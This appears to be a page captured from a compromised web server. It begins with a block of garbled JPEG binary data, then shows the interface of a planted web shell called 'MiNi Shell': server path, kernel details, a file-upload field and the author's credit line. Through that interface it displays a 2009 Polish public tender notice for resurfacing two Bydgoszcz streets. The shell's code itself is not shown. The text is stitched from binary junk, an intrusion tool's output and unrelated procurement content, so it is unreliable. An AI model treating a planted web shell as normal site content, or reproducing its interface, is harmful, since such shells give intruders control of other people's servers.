JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/67671-N-2009.html

<p class="kh_header"><b>Bydgoszcz: Przebudowa ulic Bydgoszczy-przebudowa konstrukcji nawierzchni dwóch jezdni: ulic Kruszwickiej i Kardynała Wyszyńskiego</b><br>
<b>Numer ogłoszenia: 67671 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich i Komunikacji Publicznej , ul. Fordońska 120, 85-739 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5822366, faks 052 5822363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdmikp.bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic Bydgoszczy-przebudowa konstrukcji nawierzchni dwóch jezdni: ulic Kruszwickiej i Kardynała Wyszyńskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest robota budowlana (art.2 ust.8 UPZP), polegająca na wykonaniu wykonanie przebudowy konstrukcji nawierzchni na ulicy: Stefana kardynała Wyszyńskiego na odc. od mostu Pomorskiego do Ronda Toruńskiego dwie jezdnie i ul. Kruszwickiej dwie jezdnie na całym odcinku.
Roboty rozbiórkowe
­	rozbiórka uszkodzonego krawężnika betonowego wtopionego na ławie betonowej 
z oporem 
­	rozbiórka konstrukcji nawierzchni o łącznej grub. 39-42 cm, w tym podbudowa tłuczniowa grubości 20 cm
Materiał pochodzący z rozbiórki należy odwieźć, w porozumieniu z Wydziałem Utrzymania Ulic Zamawiającego na wskazane miejsce.

Konstrukcja nawierzchni jezdni:
-	podbudowa tłuczniowa z recyklingu grubości 10 cm
-	podbudowa MCE grub. 18 cm z doziarnieniem kruszywem twardym wg Warunków technicznych wykonania warstw podbudowy z mieszanki mineralno-cementowo-emulsyjnej. WT-M-MCE/99, IBDiM-1999, zeszyt 53.
-	warstwa wiążąca grub. 10 cm z mieszanek mineralno-bitumicznych betonu asfaltowego MMA 0-20 o strukturze częściowo zamkniętej wykonanej wg PN-EN 13108-1: 2008,
-	technologie produkcji betonu asfaltowego opracować z zastosowaniem asfaltu
D 50.
-	warstwa ścieralna z mieszanek mineralno-bitumicznych SMA 0-12,8 wg PN-EN 13108-5: 2008 - grubości 5 cm,
-	technologie produkcji mieszanki mineralno-bitumicznej opracować z zastosowaniem asfaltu modyfikowanego MODBIT 50 B,
-	produkcja i wbudowanie mieszanki SMA zgodnie z PN-EN 13108-1: 2008,
-	ustawienie krawężnika betonowego wtopionego o wymiarach 15x30x100 cm na ławie 
o wymiarach 15x20 cm z oporem 15x35 cm z betonu C- 16/20  PN-EN 206-1 : 2003,

Wykonanie nawierzchni
-	przed skropieniem emulsją, powierzchnię oczyścić przy pomocy szczotki mechanicznej 
i sprężonego powietrza,
-	skropienie podbudowy przed ułożeniem warstwy wiążącej emulsją asfaltową szybkorozpadową w ilości 0,5 kg/m2,
-	ułożenie warstwy wiążącej nawierzchni,
-	skropienie warstwy wiążącej emulsją asfaltową szybkorozpadową w ilości 0,5 kg/m2, przed ułożeniem nawierzchni,
-	ułożenie warstwy ścieralnej nawierzchni.
-	Odtworzenie nawierzchni zjazdu z jezdni nitki wschodniej do Gimnazjum pozostaje 
w gestii inwestora,

Regulacja urządzeń podziemnych
-	regulacja pionowa włazów studni rewizyjnych i wpustów ulicznych generalnie bez wymiany, w przypadku konieczności (nadmierne zużycie, uszkodzenie) wymiana urządzeń leży po stronie gestorów sieci
-	regulacja zaworów urządzeń podziemnych z uwagami jak wyżej.

Roboty odtworzeniowe
Zniszczenia zieleńców poczynione podczas wykonywania robót przez stacjonujący sprzęt 
i transport winny być usunięte przez wykonawcę zadania na swój koszt w okresie trwania umowy 

Organizacja ruchu na czas budowy

Prowadzone roboty winny być oznakowane zgodnie z rozporządzeniem Ministra Infrastruktury 
z dnia 3 lipca 2003 roku w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa drogowego i warunków ich umieszczania na drogach:
a)	załącznik 1 - Szczegółowe warunki techniczne dla znaków drogowych pionowych 
i warunki ich umieszczania na drogach,
b)	załącznik 2 - Szczegółowe warunki techniczne dla urządzeń bezpieczeństwa ruchu drogowego 
i warunki ich umieszczania na drogach. 
Wykonawca przedstawi Inspektorowi Nadzoru projekt organizacji ruchu, zatwierdzony 
przez organ zarządzający ruchem i zarząd drogi oraz wykona oznakowanie robót zgodnie 
z tym projektem na własny koszt.
Przekazanie placu budowy dla wykonania przebudowy ulic na ww. zadaniach następować będzie sukcesywnie, tak aby nie spowodować nadmiernego utrudnienia w ruchu kołowym na terenie miasta Bydgoszczy, przy czym termin realizacji liczony będzie od dnia przekazania placu budowy dla pierwszego zadania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 30.000,00 PLN
(słownie: trzydzieści tysięcy złotych 00/100), przed upływem terminu składania ofert.
2.	Wadium może być wnoszone w jednej lub kilku formach, określonych w art. 45 ust. 6 UPZP.
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego, 
tj. Bank Pocztowy S.A. O/Bydgoszcz - Nr konta 98 1320 1117 2031 0044 2000 0386 
z adnotacją WADIUM - Przebudowa ul.Kruszwickiej i Wyszyńskiego.
4.	Dowód wniesienia wadium:
1)	zaleca się dołączyć do oferty potwierdzenie przelewu pieniędzy na rachunek bankowy Zamawiającego - w formie kserokopii poświadczonej za zgodność z oryginałem przez osobę/y upoważnioną/e do reprezentowania Wykonawcy, zgodnie z formą reprezentacji, określoną w rejestrze sądowym lub innym dokumencie,
2)	potwierdzenie wniesienia wadium w pozostałych formach określonych w art. 45 ust. 6 UPZP - należy dołączyć do oferty w formie oryginału.
5.	Wadium pozostaje w dyspozycji Zamawiającego i będzie zwrócone lub zatrzymane, 
na zasadach i w trybie określonym w art. 46 UPZP.
6.	Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi 
z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone 
o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zgodnie z art. 44 UPZP spełniają warunki udziału w postępowaniu, określone przez Zamawiającego na podstawie art. 22 ust. 1 UPZP, tj:
1.	posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, potwierdzone wykonaniem, w ostatnich 5 latach przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlanej dotyczącej: wykonania nawierzchni bitumicznej o powierzchni nie mniejszej niż 6.000 m2,
2.	dysponują lub będą dysponować potencjałem technicznym, tj. sprzętem (w liczbie 
i wydajności) gwarantującym przeprowadzenie robót zgodnie z zasadami określonymi 
w specyfikacjach technicznych wykonania i odbioru robót budowlanych, 
3.	dysponują lub będą dysponować osobą zdolną do wykonania zamówienia, w tym minimum:
-	kierownikiem budowy, legitymującym się uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub drogowej, wymaganymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156 poz.1118 z późn. zm.) oraz zaświadczeniem o wpisie na listę właściwej Okręgowej Izby Inżynierów Budownictwa.
Jeżeli Wykonawca na dzień składania ofert nie dysponuje ww. osobą zdolną do wykonania zamówienia musi przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia ww. osoby zdolnej do wykonania zamówienia.   
4.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w tym:
1)	posiadają środki finansowe lub zdolność kredytową, w wysokości nie mniejszej niż 2.000.000,- (słownie: dwa miliony 00/100) PLN,
2)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na minimalną sumę ubezpieczenia 1.000.000,- (słownie: jeden milion 00/100) PLN, 
5.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 uPzp.
Sposób dokonywania oceny spełniania warunków udziału w postępowaniu:
1.		Ocena spełniania warunków udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, na podstawie analizy dokumentów i oświadczeń dołączonych przez Wykonawcę do oferty, określonych w pkt. 11.1. SIWZ.
2.	Oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu określonych w pkt. 10.1. SIWZ nie później niż w dniu upływu terminu składania ofert.
3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 23. UPZP (np. konsorcjum, spółka cywilna), spełniają warunki udziału w postępowaniu w następujący sposób:
1) warunki udziału w postępowaniu określone w pkt 10.1.1., 10.1.2., 10.1.3. i 10.1.4. SIWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego spełniają łącznie,
2) warunek udziału w postępowaniu określony w pkt 10.1.5. SIWZ każdy 
z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego musi spełniać oddzielnie.
4.	W przypadku ubiegania się o udzielenie zamówienia z udziałem podwykonawców, warunki udziału w postępowaniu określone w pkt 10.1. SIWZ spełnia Wykonawca.
5.	Zgodnie z art. 26. ust. 3 UPZP, Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 pkt.1) UPZP, lub którzy złożyli oświadczenia lub dokumenty, o których mowa w art. 25 ust. 1 pkt. 1)  UPZP, zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu, lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu nie później niż w dniu, w którym upłynął termin składania ofert.
Nie złożenie powyższych oświadczeń lub dokumentów w wyznaczonym terminie skutkować będzie wykluczeniem Wykonawcy z postępowania o zamówienie publiczne na podstawie art.24 ust.2 pkt. 3) UPZP.
6.	Zgodnie z art. 26. ust. 4 UPZP, Zamawiający wzywa Wykonawców do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów o których mowa w art. 25 ust.1 pkt.1) UPZP..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia spełniania warunków udziału w postępowaniu, określonych w pkt. 10.1. SIWZ, wykonawca składa przez dołączenie do oferty, w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę (tj. osobę/y uprawnioną/e do reprezentowania wykonawcy i składania oświadczeń woli w jego imieniu) następujące oświadczenia lub dokumenty: 
1.	oświadczenie, zgodnie z art. 44 UPZP, o spełnianiu warunków udziału w postępowaniu określonych przez Zamawiającego na podstawie art. 22 ust. 1 UPZP (wg wzoru Zamawiającego), 
2.	wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich powierzchni, oraz daty i miejsca wykonania (wg wzoru Zamawiającego,
3.	dokumenty potwierdzające (np. referencja, protokół odbioru końcowego robót), że roboty budowlane przedstawione, w ww. wykazie zostały wykonane należycie,
4. wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich posiadanych kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności (wg wzoru Zamawiającego),
5.pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, załącza tylko wtedy, jeżeli w wykazie, o którym mowa 
w pkt. 11.1.4.1) SIWZ, Wykonawca wskazał osoby, którymi będzie dysponował,
6.uprawnienia  budowlane do kierowania robotami budowlanymi - kierownika budowy. 
7.aktualne zaświadczenie o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa - kierownika budowy,
8.oświadczenie o nie podleganiu  wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 UPZP (wg wzoru Zamawiającego),
9. aktualny/e odpis/y z właściwego rejestru albo aktualne zaświadczenie/a o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione 
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
10.aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert.
11.aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 4-8 UPZP - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
12.aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt. 9 UPZP - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
Wymagane dokumenty Wykonawca składa zgodnie z przepisami rozporządzenia Prezesa Rady ministrów z dnia 19.05.2006 r. w sprawie rodzajów dokumentów, jakich zamawiający może żądać od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz.605 z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdmikp.bydgoszcz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich i Komunikacji Publicznej  85-739 Bydgoszcz, ul. Fordońska 120,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2009 godzina 09:50, miejsce: Zarząd Dróg Miejskich i Komunikacji Publicznej 85-739 Bydgoszcz, ul. Fordońska 120, pokój 02 (kancelaria/parter0..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com